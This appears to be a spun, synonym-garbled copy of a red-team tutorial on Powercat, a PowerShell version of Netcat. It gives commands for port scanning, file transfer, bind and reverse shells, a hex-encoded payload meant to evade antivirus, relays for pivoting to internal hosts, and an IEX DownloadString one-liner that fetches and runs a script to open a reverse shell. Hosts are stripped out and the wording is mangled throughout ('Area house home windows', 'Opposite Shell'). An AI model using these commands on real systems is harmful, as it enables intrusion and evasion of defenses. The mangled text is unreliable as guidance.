Breaking News


Powercat is a simple community device used to accomplish low-level community conversation operations. The device is an implementation of the well known Netcat in Powershell. Conventional anti-viruses are recognized to permit Powercat to execute. The put in dimension of the applying is 68 KB. The portability and platform independence of the device makes it an an important arrow in each and every red teamer’s quiver. On this article, we’ll display and learn the potential for this device. You’ll be able to obtain this correct proper right here.

Desk of Content material subject matter subject material

  • Basic Conceivable possible choices in Powercat
  • Putting in place Powercat
  • Port Scanning
  • Record Switch
  • Bind Shell
    • Netcat to Powercat
    • Powercat to Powercat
  • Opposite Shell
    • Netcat to Powercat
    • Powercat to Powercat
  • Standalone Shell
  • Encoded Shell
  • Tunnelling
  • Powercat One Liner

Basic Conceivable possible choices in Powercat

Powercat helps rather numerous imaginable possible choices to debris spherical with. We’ll cover the next on this article.

-lListen for a connection
-cConnect with a listener
-pThe port to hook up with, or concentrate on
-epExecute Powershell
-gGenerate Payload
-geGenerate Encoded Payload
-dDisconnect flow into
-iEnter knowledge

Putting in place Powercat

Powershell execution coverage is a security function in Area house home windows which determines which scripts can or can not run at the instrument, due to this fact, we need to set the Powershell execution coverage to “bypass.” This may occasionally permit all scripts to run with out restriction. Thereafter, we need to obtain Powercat the use of wget.

powershell -ep bypass
wget -o powercat.ps1

Now that we have downloaded the Powercat script, we will be able to import it into the existing Powershell terminal after which it is going to neatly be used.

Import-Module .powercat.ps1

Port Scanning

Powercat is provided with the possible to scan for open ports. It is in a position to do that by the use of making an attempt a TCP connection to the ports outlined. As an example, if I’ve to test for a working provider on port 21,22,80,443, we will be able to do that by the use of:

(21,22,80,443) | % {powercat -c -p $_ -t 1 -Verbose -d}

 Understand that correct proper right here, we’ve got were given got appended port quantity as an inventory variable. The consumer mode (-c flag) specifies the buyer to scan. As we will be able to practice all the way through the screenshot underneath that if the port was once discovered to be open, Powercat effectively prepare a flow into with the provider. the disconnect variety (-d) flag specifies Powercat to disconnect the flow into as in brief because of it’ll get open. Due to this fact, that is how open ports can also be came upon the use of Powercat.

Record Switch

Record switch is imaginable in Powercat by the use of knowledge enter all the way through the knowledge flow into and fetching it on the consumer finish.

Let’s create a textual content record known as “notes.txt” all the way through the supply folder. Correct proper right here, enter flag (-i) is used to enter knowledge all the way through the flow into. This can be utilized to transport data, byte array object or strings too.

Now, we’ll first prepare the listener on the consumer finish. Allow us to use netcat in Linux for ease correct proper right here. After atmosphere it up, we’ll then use Powercat to change this newsletter record.

nc -lnvp 443 > notes.txt
powercat -c -p 443 -i notes.txt

Now, irrespective of was once in notes.txt has been transferred to our vacation spot. As you are able to see, the record is effectively created after a a good fortune connection was once terminated.

 Bind Shell

Bind shell refers back to the procedure the place the attacker is in a position to connect with an open listener on the objective instrument and have interaction. To turn this, we’ll prepare a listener on the objective the use of Powercat after which connect with it. There are two eventualities correct proper right here:

  1. Netcat to Powercat: Correct proper right here, the attacker is Kali and Area house home windows has a listener working on it.

Attacker -> Kali

Sufferer -> Area house home windows

In an excellent scenario, the attacker would ship a code that may get finished to open a listener after which permit the attacker to additional keep up a correspondence with the sufferer by the use of connecting to it.

powercat -l -p 443 -e cmd
nc 443

And thus, we practice that the interactive consultation is now energetic at the attacker instrument.

  1. Powercat to Powercat: The an identical could be completed between two Powercat scripts too. At the listener, we prepare port 9000 and the attacker to glue and ship the cmd executable.

Listener: Ignite (Area house home windows username)

Attacker: raj (Area house home windows username)

powercat -l -p 9000 -e cmd -v
powercat -c -p 9000 -v

As you are able to see that the attacker is effectively being able to connect with the listener and spawns an interactive consultation. We checked the id the use of whoami.

Opposite Shell

Opposite shell refers back to the procedure in which the attacker instrument has a listener working to which the sufferer connects after which the attacker executes code.

  1. Netcat to Powercat: Correct proper right here, Kali (netcat) is the attacker instrument with the listener working on port 443 and Area house home windows working Powercat (sufferer) shall connect with it.

Attacker: Netcat (Kali)

Sufferer: Ignite (Area house home windows username)

That is completed by the use of first working netcat in listener mode at the attacker instrument after which working powercat in consumer mode to glue.

nc -lvnp 443
powercat -c -p 443 -e cmd.exe

As you are able to see, as in brief given that sufferer enters the Powershell command, we get an interactive shell

  1. Powercat to Powercat: The an identical can also be finished with two Area house home windows units too.

Attacker: Ignite (Area house home windows Username)

Sufferer: raj (Area house home windows Username)

Let’s prepare a listener on port 9000 first after which run powercat in consumer mode to hook up with it.

powercat -l -p 9000 -v
powercat -c -p 9000 -e cmd -v

As you are able to see, an interactive shell has been spawned by the use of connecting to this listener.

Then again in the end, the above Powercat command on the sufferer’s finish is only a simulation of the easiest way gaining an interactive shell by the use of a ways flung code execution in unique lifestyles would paintings.

Standalone shell

The choice comes in handy for when a script can also be finished all the way through the instrument. This permits an attacker to code a opposite shell in a “.ps1” record and look ahead to the script to be finished. State of affairs 1: Let’s say a cron process is operating that executes a script that has to write down get admission to. One can copy-paste the next command to get opposite shell simply even and now not using a Powershell command execution get admission to.

powercat -c -p 443 -e cmd.exe -g > shell.ps1

Make certain the listener is operating. We’re the use of Kali as an attacker instrument the use of netcat.

nc -lnvp 443

As you are able to see, there are a few techniques to get an interactive shell at the objective instrument the use of netcat.

Encoded Shell

To evade conventional coverage units like Anti-Virus answers, we will be able to encode the shell that we used above. Powercat has an excellent function to encode a command to Hexadecimal Array. This fashion, one of the most a very powerful elementary security features can also be bypassed. That is finished by the use of:

powercat -c -p 443 -e cmd.exe -ge > encodedshell.ps1

After which the shell can also be run by the use of the use of the powershell -E variety which is in a position to execute an encoded string.

powershell -E <string>

The string is then encoded price from above.

We had prepare a listener in our attacker instrument (kali) up to now and feature been taking a look ahead to the relationship. As you are able to see the shell is getting finished effectively.


Tunnelling is the most efficient mechanism of keeping up stealth whilst doing red crew operations and even in real-life eventualities. Powershell and Powercat can lend a hand us with tunnelling and hiding our id subsequent time we behavior a red crew evaluation.

Correct proper right here, there are 3 machines. Correct proper right here, the Attacker communicates with a tool with two LAN participating in enjoying playing cards and assaults a tool working on each and every different subnet (

Now, let’s suppose the attacker already has get admission to to the tunnel instrument. We’ll mirror the positioning the use of the Input-PSSession command. This device we could in us to get an interactive Powershell terminal of the tunnel with the assistance of credentials.

Input-PSSession -ComputerName -Credential raj

When we enter the credentials, we will be able to see that an interactive PowerShell consultation has been spawned.

We run ipconfig as a validator command alternatively, we made an enchanting observation. This system had two LAN participating in enjoying playing cards configured and there was once each and every other adapter attached. It’s imaginable that different machines are working in this subnet.

To paintings on our observation, we’d want Powercat on this instrument. We obtain it the use of wget.

wget -o powercat.ps1

Then again ahead of we will be able to run this script, we need to trade the execution coverage yet again. Additionally, upon little taking a look, we discovered that was once alive and responding. Let’s scan the program the use of Powercat

Set-ExecutionPolicy -ExecutionPolicy RemoteSigned
Import-Module .powercat.ps1
(21, 22, 80, 443) | % { Powercat -c -p $_ -t 1 -Verbose -d}

As you are able to see, there have been 3 ports open: 21,22,80

Now, if we prepare a visitors relay correct proper right here, our attacker instrument could possibly keep up a correspondence and connect with SSH at the sufferer instrument (

We’ll use Powercat to arrange a visitors relay:

powercat -l -p 9090 -r tcp: -v

As you are able to see above, TCP visitors from port 22 on is now being relayed by the use of (tunnel) on port 9090. Thus, from an exterior instrument, we use PuTTY to hook up with the tunnel instrument’s 9090 port which is in a position to attach us to the sufferer instrument.

And very similar to that, we’ve got finished our tunnel and accessed our sufferer instrument.

We will be able to use Powercat to setup relay on port 80 too all the way through which we’ll have the ability to get admission to the web website working on sufferer.

powercat -l -p 9090 -r tcp: -v

As evident, the sufferer is now to be had available in the market by the use of this tunnel.

Powercat One Liner

Powercat’s opposite shell exists as a one-liner command too. Think that we have code execution at the sufferer, we will be able to use Powercat’s one-liner to get a opposite shell another time at the listener working at the attacker’s instrument. For this procedure, we need to obtain Powercat in a separate folder and run a internet server.

wget -o powercat.ps1
python -m SimpleHTTPServer 80

Now, we’ll prepare a listener on port 4444 all the way through the attacker (kali) instrument right away. Inside the period in-between, we’ve got were given got code execution at the objective and thus, we’ll use the next Powershell/Powercat one liner:

powershell -c "IEX(New-Object System.Web.WebClient).DownloadString('');powercat -c -p 4444 -e cmd"

In short as we hit input, we’ll obtain a opposite shell at the listener working in Kali.


Due to this fact, we’ve got were given got demonstrated rather numerous capability of Powercat on this article. The device is being readily utilized in red crew assessments and changing into a part of number one cyber coverage certification lessons. Hope the item is helping aspirants/scholars or analysts to grasp the device in a easy and atmosphere pleasant method. Thank you for studying.

Writer: Harshit Rajpal is an InfoSec researcher and left and right kind ideas philosopher. Touch correct proper right here

Leave a Reply

Your email address will not be published. Required fields are marked *

Donate Us